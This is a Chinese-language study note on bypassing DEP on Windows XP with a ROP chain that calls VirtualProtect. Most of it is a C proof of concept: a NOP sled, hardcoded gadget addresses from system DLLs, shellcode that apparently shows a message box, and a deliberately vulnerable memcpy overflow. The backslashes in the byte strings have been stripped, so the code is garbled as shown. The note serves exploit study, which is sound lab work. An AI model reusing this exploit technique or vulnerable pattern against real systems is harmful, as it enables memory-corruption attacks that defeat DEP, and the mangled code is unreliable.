首先 WINDOWS 2003 是默认开启DEP的 一般都拿2003来做试验
今天我用 XP 开启DEP 做实验 一回事
·······················································
只是学习笔记·····································另外的方法:
Ret2libc NtSetInformationProcess 去关闭DEP
BOOL VirtualProtect( LPVOID lpAddress, // 目标地址起始位置 *shellcode所在内存空间起始地址 DWORD dwSize, // 大小 *shellcode大小 DWORD flNewProtect, // 请求的保护方式 *0x40 PAGE_EXECUTE_READWRITE PDWORD lpflOldProtect // 保存老的保护方式 *某个可写地址 );成功返回非0 修改失败返回0
先总结:
首先 一般都是覆盖 返回地址,因为 软 DEP 也就是 SAFESEH 那么要用 可执行的模块!!!!!!!
!searchcode jmp esp 可以显示 模块属性 DEP寻找特殊代码时要用!!!!!!!!!!!!!!!
书上的例子 是覆盖返回地址 然后 溢出漏洞函数 从 strcpy 改为 memcpy 函数 ,因为它对 "x00"不截断
#include "stdafx.h" #include <windows.h> char shellcode[] = "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90" // PS 这种方法不能用OD插件快速找到地址,可用 !searchcode jmp esp //7C80997D 58 pop eax ret "x7dx99x80x7c" //地址=7C92E7D9 //消息=Found:POP ESI POP EBX POP EDI RETN at 0x7c92e7d9 Module: C:WINDOWSsystem32 tdll.dll "xd9xe7x92x7c"//这里不能修改 ESP,EBP,EAX //地址=7D760702 //消息=Found:PUSH ESP POP EBP RET 4 at 0x7d760702 Module: C:WINDOWSsystem32shell32.dll "x02x07x76x7d" //7C92120F C3 retn "x0fx12x92x7c" "x90x90x90x90" "xc6xc6xebx77"//77EBC6C6 push esp jmp esp "xffx00x00x00" //修改内存大小 "x40x00x00x00" //可读写执行内存属性代码 "xc6xc6xebx77"//77EBC6C6 push esp jmp eax "x90x90x90x90" "x90x90x90x90" /* 7C801AD9 FF75 14 push dword ptr ss:[ebp+0x14] 7C801ADC FF75 10 push dword ptr ss:[ebp+0x10] 7C801ADF FF75 0C push dword ptr ss:[ebp+0xC] 7C801AE2 FF75 08 push dword ptr ss:[ebp+0x8] 7C801AE5 6A FF push -0x1 7C801AE7 E8 75FFFFFF call kernel32.VirtualProtectEx */ "xd9x1ax80x7c" "x90x90x90x90" //7C8369F0 FFD4 call esp "xf0x69x83x7c" "x90x90x90x90" "x90x90x90x90" "x90x90x90x90" "x90x90x90x90" //shellcode: "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C" "x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53" "x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B" "x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95" "xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59" "x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A" "xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75" "xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03" "x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB" "x53" "x68x64x61x30x23" "x68x23x50x61x6E" "x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";//168 ; void test() { char str[176]; memcpy(str,shellcode,420); } int main(int argc, char* argv[]) { HINSTANCE hTnst = LoadLibrary("shell32.dll"); char temp[200]; test(); return 0; }
这种方法不好用啊 看看能不能突破······························因为strcpy要截断字符